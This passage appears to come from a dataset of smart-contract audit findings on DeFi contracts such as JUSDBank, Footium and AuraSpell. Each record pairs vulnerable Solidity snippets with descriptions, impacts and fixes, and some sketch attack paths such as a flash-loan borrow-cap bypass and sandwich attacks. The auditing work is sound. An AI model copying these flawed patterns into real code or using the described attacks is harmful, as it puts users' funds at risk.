collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n\\nIn the other hand, the `isDepositAllowed` is validated in the deposit function in the `code line 255` but the withdraw to internal account is not validated.\\n```\\nFile: JUSDBank.sol\\n function _deposit(\\n DataTypes.ReserveInfo storage reserve,\\n DataTypes.UserInfo storage user,\\n uint256 amount,\\n address collateral,\\n address to,\\n address from\\n ) internal {\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n```\\n\\nAdditionally, the `ReserveInfo.isDepositAllowed` can be modified via the JUSDOperation.delistReserve() function. So any collateral's deposits can be deactivated at any time.\\n```\\nFile: JUSDOperation.sol\\n function delistReserve(address collateral) external onlyOwner {\\n DataTypes.ReserveInfo storage reserve = reserveInfo[collateral];\\n reserve.isBorrowAllowed = false;\\n reserve.isDepositAllowed = false;\\n reserve.isFinalLiquidation = true;\\n emit RemoveReserve(collateral);\\n }\\n```\\nчAdd a `Reserve.isDepositAllowed` validation when the withdrawal is to another internal account.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n// Add the line below\\n// Add the line below\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] // Add the line below\\n= amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\nчThe collateral's reserve can get deposits via the internal withdraw even when the `Reserve.isDepositAllowed` is turned off making the `Reserve.isDepositAllowed` useless because the collateral deposits can be via `internal withdrawals`.ч```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n -Lack of burn mechanism for JUSD repayments causes oversupply of JUSDчmediumч`JUSDBank.repay()` allow users to repay their JUSD debt and interest by transfering in JUSD tokens. Without a burn mechanism, it will cause an oversupply of JUSD that is no longer backed by any collateral.\\n`JUSDBank` receives JUSD tokens for the repayment of debt and interest. However, there are no means to burn these tokens, causing JUSD balance in `JUSDBank` to keep increasing.\\nThat will lead to an oversupply of JUSD that is not backed by any collateral. And the oversupply of JUSD will increase significantly during market due to mass repayments from liquidation.\\n```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\nчInstead of transfering to the JUSDBank upon repayment, consider adding a burn mechanism to reduce the supply of JUSD so that it will be adjusted automatically.чTo maintain its stability, JUSD must always be backed by more than 1 USD worth of collateral.\\nWhen there is oversupply of JUSD that is not backed by any collateral, it affects JUSD stability and possibly lead to a depeg event.ч```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\n -UniswapPriceAdaptor fails after updating impactчmediumчThe `impact` variable can have a maximum value of `uint32` (=4.294.967.295) after updating. This is too low and will cause the `UniswapPriceAdaptor#getMarkPrice()` function to revert.\\nWhen initialized, the `impact` variable is a `uint256`. However, in the `updateImpact` function, the newImpact is a `uint32`.\\n```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n\\nThe new `impact` variable will be too small because in the getMarkPrice() function, we need diff * 1e18 / JOJOPriceFeed <= impact:\\n```\\n require(diff * 1e18 / JOJOPriceFeed <= impact, \"deviation is too big\");\\n```\\n\\nThe result of `diff * 1e18 / JOJOPriceFeed <= impact` is a number with e18 power. It is very likely that it is larger than the `impact` variable which is a `uint32`. The function getMarkPrice() will revert.чChange the newImpact argument from uint32 to uint256.\\n```\\n// Remove the line below\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n// Add the line below\\n function updateImpact(uint256 newImpact) external onlyOwner { \\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\nчThe UniswapPriceAdaptor will malfunction and not return the price from Uniswap Oracle.ч```\\n function updateImpact(uint32 newImpact) external onlyOwner {\\n emit UpdateImpact(impact, newImpact);\\n impact = newImpact;\\n }\\n```\\n -In over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidateeчmediumчIn over liquidation, if the liquidatee has USDC-denominated assets for sale, the liquidator can buy the assets with USDC to avoid paying USDC to the liquidatee\\nIn JUSDBank contract, if the liquidator wants to liquidate more collateral than the borrowings of the liquidatee, the liquidator can pay additional USDC to get the liquidatee's collateral.\\n```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n\\nThe liquidator needs to pay USDC in the callback and the JUSDBank contract will require the final USDC balance of the liquidatee to increase.\\n```\\n require(\\n IERC20(primaryAsset).balanceOf(liquidated) -\\n primaryLiquidatedAmount >=\\n liquidateData.liquidatedRemainUSDC,\\n JUSDErrors.LIQUIDATED_AMOUNT_NOT_ENOUGH\\n );\\n```\\n\\nIf the liquidatee has USDC-denominated assets for sale, the liquidator can purchase the assets with USDC in the callback, so that the liquidatee's USDC balance will increase and the liquidator will not need to send USDC to the liquidatee to pass the check in the JUSDBank contract.чConsider banning over liquidationчIn case of over liquidation, the liquidator does not need to pay additional USDC to the liquidateeч```\\n } else {\\n // actualJUSD = actualCollateral * priceOff\\n // = JUSDBorrowed * priceOff / priceOff * (1-insuranceFeeRate)\\n // = JUSDBorrowed / (1-insuranceFeeRate)\\n // insuranceFee = actualJUSD * insuranceFeeRate\\n // = actualCollateral * priceOff * insuranceFeeRate\\n // = JUSDBorrowed * insuranceFeeRate / (1- insuranceFeeRate)\\n liquidateData.actualCollateral = JUSDBorrowed\\n .decimalDiv(priceOff)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.insuranceFee = JUSDBorrowed\\n .decimalMul(reserve.insuranceFeeRate)\\n .decimalDiv(JOJOConstant.ONE - reserve.insuranceFeeRate);\\n liquidateData.actualLiquidatedT0 = liquidatedInfo.t0BorrowBalance;\\n liquidateData.actualLiquidated = JUSDBorrowed;\\n }\\n\\n liquidateData.liquidatedRemainUSDC = (amount -\\n liquidateData.actualCollateral).decimalMul(price);\\n```\\n -FlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDCчmediumчFlashLoanLiquidate.JOJOFlashLoan has no slippage control when swapping USDC\\nIn both GeneralRepay.repayJUSD and FlashLoanRepay.JOJOFlashLoan, the user-supplied minReceive parameter is used for slippage control when swapping USDC.\\n```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n```\\n\\nHowever, this is not done in FlashLoanLiquidate.JOJOFlashLoan, and the lack of slippage control may expose the user to sandwich attacks when swapping USDC.чConsider making FlashLoanLiquidate.JOJOFlashLoan use the minReceive parameter for slippage control when swapping USDC.чThe lack of slippage control may expose the user to sandwich attacks when swapping USDC.ч```\\n function JOJOFlashLoan(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes calldata param\\n ) external {\\n (address approveTarget, address swapTarget, uint256 minReceive, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n// rest of code\\n function repayJUSD(\\n address asset,\\n uint256 amount,\\n address to,\\n bytes memory param\\n ) external {\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n uint256 minReceive;\\n if (asset != USDC) {\\n (address approveTarget, address swapTarget, uint256 minAmount, bytes memory data) = abi\\n .decode(param, (address, address, uint256, bytes));\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n minReceive = minAmount;\\n }\\n\\n uint256 USDCAmount = IERC20(USDC).balanceOf(address(this));\\n require(USDCAmount >= minReceive, \"receive amount is too small\");\\n```\\n -JUSDBank users can bypass individual collateral borrow limitsчmediumчJUSDBank imposes individual borrow caps on each collateral. The issue is that this can be bypassed due to the fact that withdraw and borrow use different methods to determine if an account is safe.\\n```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n\\nWhen borrowing the contract calls _isAccountSafeAfterBorrow. This imposes a max borrow on each collateral type that guarantees that the user cannot borrow more than the max for each collateral type. The issues is that withdraw doesn't impose this cap. This allows a user to bypass this cap as shown in the example below.\\nExample: Assume WETH and WBTC both have a cap of 10,000 borrow. The user deposits $30,000 WETH and takes a flashloand for $30,000 WBTC. Now they deposit both and borrow 20,000 JUSD. They then withdraw all their WBTC to repay the flashloan and now they have borrowed 20,000 against $30000 in WETHчAlways use _isAccountSafeAfterBorrowчDeposit caps can be easily surpassed creating systematic risk for the systemч```\\n function borrow(\\n uint256 amount,\\n address to,\\n bool isDepositToJOJO\\n ) external override nonReentrant nonFlashLoanReentrant{\\n // t0BorrowedAmount = borrowedAmount / getT0Rate\\n DataTypes.UserInfo storage user = userInfo[msg.sender];\\n _borrow(user, isDepositToJOJO, to, amount, msg.sender);\\n require(\\n _isAccountSafeAfterBorrow(user, getTRate()),\\n JUSDErrors.AFTER_BORROW_ACCOUNT_IS_NOT_SAFE\\n );\\n }\\n```\\n -GeneralRepay#repayJUSD returns excess USDC to `to` address rather than msg.senderчmediumчWhen using GeneralRepay#repayJUSD `to` repay a position on JUSDBank, any excess tokens are sent `to` the `to` address. While this is fine for users that are repaying their own debt this is not good when repaying for another user. Additionally, specifying an excess `to` repay is basically a requirement when attempting `to` pay off the entire balance of an account. This combination of factors will make it very likely that funds will be refunded incorrectly.\\n```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n\\nAs seen above, when there is an excess amount of USDC, it is transferred `to` the `to` address which is the recipient of the repay. When `to` != msg.sender all excess will be sent `to` the recipient of the repay rather than being refunded `to` the caller.чEither send the excess back to the caller or allow them to specify where the refund goesчRefund is sent to the wrong address if to != msg.senderч```\\n IERC20(USDC).approve(jusdExchange, borrowBalance);\\n IJUSDExchange(jusdExchange).buyJUSD(borrowBalance, address(this));\\n IERC20(USDC).safeTransfer(to, USDCAmount - borrowBalance);\\n JUSDAmount = borrowBalance;\\n }\\n```\\n -Certain ERC20 token does not return bool from approve and transfer and transaction revertчmediumчCertain ERC20 token does not return bool from approve and transfer and transaction revert\\nAccording to\\nSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transaction\\nCertain ERC20 token does not return bool from approve and transfer and transaction revert\\n```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n\\nand\\n```\\nfunction transferERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n) external onlyClubOwner {\\n erc20Contract.transfer(to, amount);\\n}\\n```\\n\\nthe transfer / approve can fail slienltyчIssue Certain ERC20 token does not return bool from approve and transfer and transaction revert\\nUse Openzeppelin SafeTransfer / SafeApproveчSome tokens do not return a bool on ERC20 methods and use IERC20 token interface will revert transactionч```\\n function setApprovalForERC20(\\n IERC20 erc20Contract,\\n address to,\\n uint256 amount\\n ) external onlyClubOwner {\\n erc20Contract.approve(to, amount);\\n }\\n```\\n -Users might lose funds as `claimERC20Prize()` doesn't revert for no-revert-on-transfer tokensчmediumчUsers can call `claimERC20Prize()` without actually receiving tokens if a no-revert-on-failure token is used, causing a portion of their claimable tokens to become unclaimable.\\nIn the `FootiumPrizeDistributor` contract, whitelisted users can call `claimERC20Prize()` to claim ERC20 tokens. The function adds the amount of tokens claimed to the user's total claim amount, and then transfers the tokens to the user:\\nFootiumPrizeDistributor.sol#L128-L131\\n```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n\\nAs the the return value from `transfer()` is not checked, `claimERC20Prize()` does not revert even when the transfer of tokens to the user fails.\\nThis could potentially cause users to lose assets when:\\n`_token` is a no-revert-on-failure token.\\nThe user calls `claimERC20Prize()` with `value` higher than the contract's token balance.\\nAs the contract has an insufficient balance, `transfer()` will revert and the user receives no tokens. However, as `claimERC20Prize()` succeeds, `totalERC20Claimed` is permanently increased for the user, thus the user cannot claim these tokens again.чUse `safeTransfer()` from Openzeppelin's SafeERC20 to transfer ERC20 tokens. Note that `transferERC20()` in `FootiumEscrow.sol` also uses `transfer()` and is susceptible to the same vulnerability.чUsers can call `claimERC20Prize()` without receiving the token amount specified. These tokens become permanently unclaimable for the user, leading to a loss of funds.ч```\\nif (value > 0) {\\n totalERC20Claimed[_token][_to] += value;\\n _token.transfer(_to, value);\\n}\\n```\\n -Users can bypass Player royalties on EIP2981 compatible markets by selling clubs as a wholeчmediumчPlayers have a royalty built in but clubs do not. This allows bulk sale of players via clubs to bypass the fee when selling players.\\nFootiumPlayer.sol#L16-L23\\n```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumPlayer implements the EIP2981 standard which creates fees when buy/selling the players.\\nFootiumClub.sol#L15-L21\\n```\\ncontract FootiumClub is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n\\nFootiumClub on the other hand never implements this standard. This allows users to sell players by selling their club to avoid any kind of fee on player sales.чImplement EIP2981 on clubs as wellчUsers can bypass fees on player sales by selling club insteadч```\\ncontract FootiumPlayer is\\n ERC721Upgradeable,\\n AccessControlUpgradeable,\\n ERC2981Upgradeable,\\n PausableUpgradeable,\\n ReentrancyGuardUpgradeable,\\n OwnableUpgradeable\\n{\\n```\\n -Merkle leaf values for _clubDivsMerkleRoot are 64 bytes before hashing which can lead to merkle tree collisionsчmediumчFootiumAcademy hashes 64 bytes when calculating leaf allowing it to collide with the internal nodes of the merkle tree.\\nMerkleProofUpgradeable.sol puts the following warning at the beginning of the contract:\\n```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n\\nFootiumAcademy.sol#L235-L240\\n```\\n if (\\n !MerkleProofUpgradeable.verify(\\n divisionProof,\\n _clubDivsMerkleRoot,\\n keccak256(abi.encodePacked(clubId, divisionTier)) <- @audit-issue 64 bytes before hashing allows collisions with internal nodes\\n )\\n```\\n\\nThis is problematic because FootiumAcademy uses clubId and divisionTier as the base of the leaf, which are both uint256 (32 bytes each for 64 bytes total). This allows collision between leaves and internal nodes. These collisions could allow users to mint to divisions that otherwise would be impossible.чUse a combination of variables that doesn't sum to 64 bytesчUsers can abuse merkle tree collisions to mint in non-existent divisions and bypass minting feesч```\\n * WARNING: You should avoid using leaf values that are 64 bytes long prior to\\n * hashing, or use a hash function other than keccak256 for hashing leaves.\\n * This is because the concatenation of a sorted pair of internal nodes in\\n * the merkle tree could be reinterpreted as a leaf value.\\n```\\n -AuraSpell#openPositionFarm uses incorrect join type for balancerчhighчThe JoinPoolRequest uses \"\" for userData meaning that it will decode into 0. This is problematic because join requests of type 0 are \"init\" type joins and will revert for pools that are already initialized.\\n```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n\\nWe see above that enum JoinKind is INIT for 0 values.\\n```\\n return _joinExactTokensInForBPTOut(balances, normalizedWeights, userData);\\n } else if (kind == JoinKind.TOKEN_IN_FOR_EXACT_BPT_OUT) {\\n return _joinTokenInForExactBPTOut(balances, normalizedWeights, userData);\\n } else {\\n _revert(Errors.UNHANDLED_JOIN_KIND);\\n }\\n```\\n\\nHere user data is decoded into join type and since it is \"\" it will decode to type 0 which will result in a revert.чUses JoinKind = 1 for user dataчUsers will be unable to open any farm position on AuraSpellч```\\nenum JoinKind { INIT, EXACT_TOKENS_IN_FOR_BPT_OUT, TOKEN_IN_FOR_EXACT_BPT_OUT }\\n```\\n -Users are forced to swap all reward tokens with no slippage protectionчhighчAuraSpell forces users to swap their reward tokens to debt token but doesn't allow them to specify any slippage values.\\nAuraSpell.sol#L193-L203\\n```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n\\nAbove all reward tokens are swapped and always use 0 for min out meaning that deposits will be sandwiched and stolen.чAllow user to specify slippage parameters for all reward tokensчAll reward tokens can be sandwiched and stolenч```\\n for (uint256 i = 0; i < rewardTokens.length; i++) {\\n uint256 rewards = _doCutRewardsFee(rewardTokens[i]);\\n _ensureApprove(rewardTokens[i], address(swapRouter), rewards);\\n swapRouter.swapExactTokensForTokens(\\n rewards,\\n 0,\\n swapPath[i],\\n address(this),\\n type(uint256).max\\n );\\n }\\n```\\n -ConvexSpell#closePositionFarm removes liquidity without any slippage protectionчhighчConvexSpell#closePositionFarm removes liquidity without any slippage protection allowing withdraws to be sandwiched and stolen. Curve liquidity has historically been strong but for smaller pairs their liquidity is getting low enough that it can be manipulated via flashloans.\\nConvexSpell.sol#L204-L208\\n```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n\\nLiquidity is removed as a single token which makes it vulnerable to sandwich attacks but no slippage protection is implemented. The same issue applies to CurveSpell.чIssue ConvexSpell#closePositionFarm removes liquidity without any slippage protection\\nAllow user to specify min outчUser withdrawals can be sandwichedч```\\n ICurvePool(pool).remove_liquidity_one_coin(\\n amountPosRemove,\\n int128(tokenIndex),\\n 0\\n );\\n```\\n -WAuraPools will irreversibly break if reward tokens are added to pool after depositчhighчWAuraPools will irreversibly break if reward tokens are added to pool after deposit due to an OOB error on accExtPerShare.\\nWAuraPools.sol#L166-L189\\n```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n\\naccExtPerShare stores the current rewardPerToken when the position is first created. It stores it as an array and only stores values for reward tokens that have been added prior to minting. This creates an issue if a reward token is added because now it will attempt to pull a value for an index that doesn't exist and throw an OOB error.\\nThis is problematic because pendingRewards is called every single transaction via the isLiquidatable subcall in BlueBerryBank#execute.чUse a mapping rather than an array to store valuesчWAuraPools will irreversibly break if reward tokens are added to pool afterч```\\n uint extraRewardsCount = IAuraRewarder(crvRewarder)\\n .extraRewardsLength(); <- @audit-issue rewardTokenCount pulled fresh\\n tokens = new address[](extraRewardsCount + 1);\\n rewards = new uint256[](extraRewardsCount + 1);\\n\\n tokens[0] = IAuraRewarder(crvRewarder).rewardToken();\\n rewards[0] = _getPendingReward(\\n stCrvPerShare,\\n crvRewarder,\\n amount,\\n lpDecimals\\n );\\n\\n for (uint i = 0; i < extraRewardsCount; i++) {\\n address rewarder = IAuraRewarder(crvRewarder).extraRewards(i);\\n\\n @audit-issue attempts to pull from array which will be too small if tokens are added\\n uint256 stRewardPerShare = accExtPerShare[tokenId][i];\\n tokens[i + 1] = IAuraRewarder(rewarder).rewardToken();\\n rewards[i + 1] = _getPendingReward(\\n stRewardPerShare,\\n rewarder,\\n amount,\\n lpDecimals\\n );\\n }\\n```\\n -UserData for balancer pool exits is malformed and will permanently trap usersчhighчUserData for balancer pool exits is malformed and will result in all withdrawal attempts failing, trapping the user permanently.\\nAuraSpell.sol#L184-L189\\n```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, \"\", false)\\n);\\n```\\n\\nWe see above that UserData is encoded as \"\". This is problematic as it doesn't contain the proper data for exiting the pool, causing all exit request to fail and trap the user permanently.\\n```\\nfunction exactBptInForTokenOut(bytes memory self) internal pure returns (uint256 bptAmountIn, uint256 tokenIndex) {\\n (, bptAmountIn, tokenIndex) = abi.decode(self, (WeightedPool.ExitKind, uint256, uint256));\\n}\\n```\\n\\nUserData is decoded into the data shown above when using ExitKind = 0. Since the exit uses \"\" as the user data this will be decoded as 0 a.k.a EXACT_BPT_IN_FOR_ONE_TOKEN_OUT. This is problematic because the token index and bptAmountIn should also be encoded in user data for this kind of exit. Since it isn't the exit call will always revert and the user will be permanently trapped.чEncode the necessary exit data in userDataчUsers will be permanently trapped, unable to withdrawч```\\nwAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(tokens, minAmountsOut, \"\", false)\\n);\\n```\\n -UniswapV3 sqrtRatioLimit doesn't provide slippage protection and will result in partial swapsчhighчThe sqrtRatioLimit for UniV3 doesn't cause the swap to revert upon reaching that value. Instead it just cause the swap to partially fill. This is a known issue with using sqrtRatioLimit as can be seen here where the swap ends prematurely when it has been reached. This is problematic as this is meant to provide the user with slippage protection but doesn't.\\n```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n\\nsqrtRatioLimit is used as slippage protection for the user but is ineffective and depending on what tokens are being swapped, tokens may be left the in the contract which can be stolen by anyone.чCheck the amount received from the swap and compare it against some user supplied minimumчIncorrect slippage application can result in partial swaps and loss of fundsч```\\n if (amountToSwap > 0) {\\n SWAP_POOL = IUniswapV3Pool(vault.pool());\\n uint160 deltaSqrt = (param.sqrtRatioLimit *\\n uint160(param.sellSlippage)) / uint160(Constants.DENOMINATOR);\\n SWAP_POOL.swap(\\n address(this),\\n // if withdraw token is Token0, then swap token1 -> token0 (false)\\n !isTokenA,\\n amountToSwap.toInt256(),\\n isTokenA\\n ? param.sqrtRatioLimit + deltaSqrt\\n : param.sqrtRatioLimit - deltaSqrt, // slippaged price cap\\n abi.encode(address(this))\\n );\\n }\\n```\\n -Balance check for swapToken in ShortLongSpell#_deposit is incorrect and will result in nonfunctional contractчhighчThe balance checks on ShortLongSpell#_withdraw are incorrect and will make contract basically nonfunctional\\nswapToken is always vault.uToken. borrowToken is always required to be vault.uToken which means that swapToken == borrowToken. This means that the token borrowed is always required to be swapped.\\nShortLongSpell.sol#L83-L89\\n```\\n uint256 strTokenAmt = _doBorrow(param.borrowToken, param.borrowAmount);\\n\\n // 3. Swap borrowed token to strategy token\\n IERC20Upgradeable swapToken = ISoftVault(strategy.vault).uToken();\\n // swapData.fromAmount = strTokenAmt;\\n PSwapLib.megaSwap(augustusSwapper, tokenTransferProxy, swapData);\\n strTokenAmt = swapToken.balanceOf(address(this)) - strTokenAmt; <- @audit-issue will always revert on 